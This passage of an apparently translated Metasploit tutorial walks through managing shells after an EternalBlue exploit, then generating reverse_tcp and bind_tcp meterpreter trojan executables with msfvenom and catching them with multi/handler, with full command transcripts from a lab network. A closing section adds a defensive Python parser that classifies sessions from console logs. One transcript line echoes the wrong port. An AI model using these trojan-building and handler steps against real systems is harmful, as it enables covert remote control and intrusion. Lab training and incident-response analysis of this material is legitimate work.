msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...

C:\Windows\system32>
background puts the returned shell session into the background; the Ctrl+Z shortcut does the same.
sessions -i 1 brings the session back to the foreground.
We can list all sessions:
msf5 > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                            Connection
  --  ----  ----               -----------                                                                            ----------
  1         shell x64/windows  Microsoft Windows [_ 6.1.7600] _ (c) 2009 Microsoft Corporation_ C:\Windows\s...  192.168.4.146:4444 -> 192.168.4.142:49158 (192.168.4.142)
sessions lists the existing sessions, either at the msf prompt or at a module prompt after use; sessions -i ID switches to the corresponding shell.
V. Trojan penetration 1 (reverse)
1. Generating a trojan (reverse-connection type)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > trojan_backward.exe
msfvenom generates a trojan program named trojan_backward.exe using the payload windows/meterpreter/reverse_tcp, a reverse-connection payload. LHOST is the IP address of our attacking machine and LPORT is the attacking machine's port (the port we need to listen on).
2. Listening for the connection in msf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.4.146
LHOST => 192.168.4.146
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.4.146:4444
Set the local (attacking) machine's IP address and the port to listen on (this port is baked into the generated trojan, which actively connects to it).
3. Copying the trojan to the target and running it (with the firewall and AV temporarily disabled)
After the trojan runs on the target, the attacking machine's listening port 4444 receives the connection and a shell is returned:
[*] Started reverse TCP handler on 192.168.4.146:4444
[*] Sending stage (180291 bytes) to 192.168.4.199
[*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.199:9018) at 2020-04-21 05:00:08 -0400

meterpreter >
At this meterpreter prompt, use help to see the available operations, such as running ipconfig or screenshot (capture the screen).
4. Using the 64-bit version
The payload used above is the 32-bit version by default; for 64-bit, use windows/x64/meterpreter/reverse_tcp.
Note: if the trojan was generated with a 64-bit payload, then after use exploit/multi/handler in msf the matching 64-bit payload must also be selected with the following command:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
Everything else is the same as for 32-bit.
Summary: the payload used by the trojan must match the payload set in msf. This applies to every payload.
VI. Trojan penetration 2 (bind)
1. Generating a trojan (bind-connection type)
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.4.199 LPORT=5555 -f exe > trojan_forward.exe
Note that LHOST means something different here than with reverse_tcp: it is the target's IP address, and LPORT is the port the target listens on.
2. Actively connecting to the trojan from msf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     5555             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set RHOST 192.168.4.199
RHOST => 192.168.4.199
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 4444
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.4.199:5555
Again we start with exploit/multi/handler; unlike the reverse method, the payload type must be set manually, here windows/meterpreter/bind_tcp.
Then set RHOST to the target's IP address and LPORT to the target's listening port 5555. Once a user on the target executes the trojan, it listens on port 5555 and waits for the attacking machine's msf to connect.
3. Running the trojan on the target
The trojan can also be run on the target before msf connects (the result is the same).
After the trojan runs (listening on the target's port 5555), msf shows a successful connection:
[*] Started bind TCP handler against 192.168.4.199:5555
[*] Sending stage (206403 bytes) to 192.168.4.199
[*] Meterpreter session 2 opened (192.168.4.146:41015 -> 192.168.4.199:5555) at 2020-04-21 05:05:42 -0400

meterpreter >
All remaining operations are the same as in the reverse method.
The choice between reverse and bind depends mainly on the network layout: if the attacking machine is on the public Internet (reachable by the target) and the target is on a LAN, use the reverse method; if the target is on the public Internet, the bind method can be used.
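The session lines printed by the handler in sections V and VI encode which side opened the TCP connection: with a reverse payload the handler's own listening endpoint (192.168.4.146:4444) appears first, while with a bind payload the handler connects out and the target's listening endpoint (192.168.4.199:5555) appears second. For an incident responder reading a recovered console log, that direction decides whether to look for egress from the victim or ingress to it. The following is an added example, not code from the page or from Metasploit, that parses constructed log lines in the shape shown above and classifies each session; it assumes the handler's "Started ... TCP handler" line precedes the session line, as it does in the transcripts on this page.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: handler and session lines in the shape msfconsole prints
# (addresses and ports mirror the transcripts quoted on this page; the third
# session has no matching handler line so its direction cannot be determined).
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 192.168.4.146:4444
[*] Sending stage (180291 bytes) to 192.168.4.199
[*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.199:9018) at 2020-04-21 05:00:08 -0400
[*] Started bind TCP handler against 192.168.4.199:5555
[*] Sending stage (206403 bytes) to 192.168.4.199
[*] Meterpreter session 2 opened (192.168.4.146:41015 -> 192.168.4.199:5555) at 2020-04-21 05:05:42 -0400
[*] Command shell session 3 opened (10.0.0.5:4444 -> 10.0.0.9:49159) at 2020-04-20 04:52:13 -0400
"""

HANDLER_RE = re.compile(
    r"Started (?P<kind>reverse|bind) TCP handler (?:on|against) (?P<addr>[^:\s]+):(?P<port>\d+)")
SESSION_RE = re.compile(
    r"(?P<kind>Meterpreter|Command shell) session (?P<sid>\d+) opened "
    r"\((?P<laddr>[^:\s]+):(?P<lport>\d+) -> (?P<raddr>[^:\s]+):(?P<rport>\d+)\) at (?P<when>.+)$")

Endpoint = Tuple[str, int]


@dataclass
class Session:
    sid: int
    kind: str            # "Meterpreter" or "Command shell"
    local: Endpoint      # the handler (attacker) side, printed first by msf
    peer: Endpoint       # the target side, printed second
    direction: str       # "reverse", "bind" or "unknown"
    opened_at: str


def classify_sessions(log_text: str) -> List[Session]:
    """Pair each 'session opened' line with the handler that produced it."""
    listeners = set()      # endpoints on which a reverse handler is listening
    bind_targets = set()   # target endpoints a bind handler connects out to
    sessions: List[Session] = []
    for line in log_text.splitlines():
        h = HANDLER_RE.search(line)
        if h:
            endpoint = (h["addr"], int(h["port"]))
            (listeners if h["kind"] == "reverse" else bind_targets).add(endpoint)
            continue
        s = SESSION_RE.search(line)
        if not s:
            continue
        local = (s["laddr"], int(s["lport"]))
        peer = (s["raddr"], int(s["rport"]))
        if local in listeners:
            direction = "reverse"   # target initiated: look for egress from the target
        elif peer in bind_targets:
            direction = "bind"      # handler initiated: look for ingress to the target
        else:
            direction = "unknown"
        sessions.append(Session(int(s["sid"]), s["kind"], local, peer, direction, s["when"]))
    return sessions


def initiator(session: Session) -> Optional[str]:
    """The host that opened the TCP connection, or None when the direction is unknown."""
    if session.direction == "reverse":
        return session.peer[0]
    if session.direction == "bind":
        return session.local[0]
    return None


if __name__ == "__main__":
    for s in classify_sessions(SAMPLE_LOG):
        print(f"session {s.sid} ({s.kind}) {s.direction:8} initiated by {initiator(s)}")
```

The same pairing logic applies to a firewall or flow log: a reverse session shows up as an outbound connection from the target to the handler port, a bind session as an inbound connection to a port the target was not previously listening on.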